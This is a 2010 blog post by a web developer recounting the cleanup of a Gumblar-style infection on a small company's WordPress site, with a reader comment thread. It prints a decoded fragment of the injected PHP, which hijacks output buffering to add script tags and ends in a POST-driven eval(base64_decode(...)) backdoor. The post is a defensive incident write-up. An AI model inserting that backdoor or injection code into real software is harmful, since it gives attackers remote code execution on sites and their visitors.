Published 2010-03-03 16:58:00

Just about finished a gumblar cleanup, for a small Hong Kong company. This is not the first crack I've seen in the last few months, I fixed another server last month that got ssh brute force attacked. It looks like cracking is on the up, so if you need help fixing a site, by someone who knows what they are doing, and at the same time you will help out a number of open source projects - give me a bell (alan@akbkhome.com)

The gumblar (or derivative) attack I was looking at was quite interesting, the first indication the owner got was that browsers kept showing the "Reported Attack Site!" or "Warning: Visiting this site may harm your computer" message. So I get the call to find out what's going on.

When you ignore the message and go through to the site, look at the HTML the first thing you see is that there is a <script> tag added just before the body pointing to a gifimg.php file. After that you have a long hunt around google to find out what's going on.

At the time of writing, the exact attack vector does not look like it's been confirmed, but is either a brute force ftp attack (I think is quite unlikely considering the username/pass combo on this sample site). Or more likely a PDF desktop attack to a machine that has access to the site.

My first assumption was that it was a Wordpress exploit, but the more I examined the situation, it seemed less likely. However I highly suspect that the PDF attack vector having got the ftp credentials goes looking for standard locations of wordpress installations (eg. '/wordpress) - so hint one is not to install your software in such obvious places.

Cleaning it out

The first step in sorting out the mess was to mirror the original site, with virus and all onto a offline location. (both as a precaution that if we broke things we had a backup, and so we can use this as a source to replace the hacked files with new ones).

After that it was a matter of googling for details of the attack and writing a gumblar cleaner script. It basically checks for infected file types, then preg_replaces out the hacked additions. These include

  • php files with an eval/base64_encode line
  • javascript files with document.write lines
  • html, shtml and htm files with <script tags.

I used ftpput, and check return values, to ensure that each file was successfully replaced before overwriting the local copy and making a nice copy for my reference into the virus folder.

Inside out of the attack.

The infection is quite interesting, and in this case was quite painful, due to the nature of how Wordpress publishes files.

Initially I suspect the core code in the PDF actually has some ftp code which will try and modify standard set of PHP files to add a small base64_encode script.. (phplist, and wordpress appear to be core targets, and I'm sure there are more.)

This is a snippet of some of the code that get's added (it's all eval, base64_encoded - read up on my blog post about idiot ways to protect your PHP code using this idea.)

This is a snippet of the decoded script


if(!function_exists('kqyf')){
function kqyf($s){

... infect the page stuff goes here...
}
function kqyf2($a,$b,$c,$d){
global$kqyf1;
$s=array();
if(function_exists($kqyf1))
call_user_func($kqyf1,$a,$b,$c,$d);
foreach(@ob_get_status(1)as$v)
if(($a=$v['name'])=='kqyf')
return;
elseif($a=='ob_gzhandler')
break;
else
$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){
$s[$i][1]=ob_get_contents();
ob_end_clean();
}
ob_start('kqyf');
for($i=0;$i<count($s);$i++){
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}

$kqyfl=(($a=@set_error_handler('kqyf2'))!='kqyf2')?$a:0;
eval(base64_decode($_POST['e']))

After that wordpress does it's wonders and infects the rest of the site for you. As all the generated pages suddenly get the extra <script tags> when publishing and your wordpress outputs the infection into the admin system.

Note: I only dissected one of the php scripts, which changed output buffering adding the <script tag, but did not see the document.write changer. I suspect there may be another variant of the script above that i did not look at that modifies the javascript files, or that it's done remotely.

Anyway all cleaned up after a few days (due to the long time the original backup took) . After this the recommendations for the owner where, stop using adobe PDF viewer (there are alternatives out there) - stop using IE, ask all staff to use Firefox with noscript. and keep a backup!

Mentioned By:
www.abcphp.com : abcphp.com - Reported Attack Site - recovering from gumbars | AK BK... (270 referals)
www.planet-php.net : Planet PHP (86 referals)
google.com : reported attack site (16 referals)
google.com : Reported Attack Page (9 referals)
google.com : reported attack page wordpress (9 referals)
google.com : Reported Attack Page! (8 referals)
google.com : "reported attack site" (4 referals)
forum.kohanaphp.pl : Problem ze stroną, wirus czy cośpodobnego, pomocy !!! (4 referals)
google.com : wordpress "Reported Attack Page!" (3 referals)
abcphp.org : My Site - Reported Attack Site - recovering from gumbars | AK BK... (3 referals)
google.com : "reported attack site" ignore (2 referals)
google.com : attack site sample (2 referals)
google.com : gumblars (2 referals)
google.com : virus attacks reported in March 2010 (2 referals)
google.com : wordpress attack site (2 referals)
www.php-trails.com : PHP trails - aggregating php news (1 referals)
www.drop-zone-city.com : [ Le KIoSQUE par Drop Zone City ] (1 referals)
planet-php.org : Planet PHP (1 referals)
phpbenelux.eu : phpbenelux.eu | PHP Benelux user group (1 referals)
google.com : api for prevent website from gifimg.php file in php (1 referals)

Comments

Version control helped me
FTP account got attacked, some spam injection scripts were uploaded. Just needed to redeploy latest production code. Was very relieved, that I didn't need to clean it manually.
#0 - Andris ( Link) on 2010-03-03 01:29:02 Delete Comment
cracked software
A lot of these FTP-attacks happen because people use cracked versions of ftp-clients. CuteFTP is 1 among them. The cracked version contains a bit of extra code that uploads all the credentials you save in the app to a remote server. Then the credentials get picked up by automated scripts that do the further infection.
#1 - Jo Giraerts ( Link) on 2010-03-03 23:02:05 Delete Comment

Add Your Comment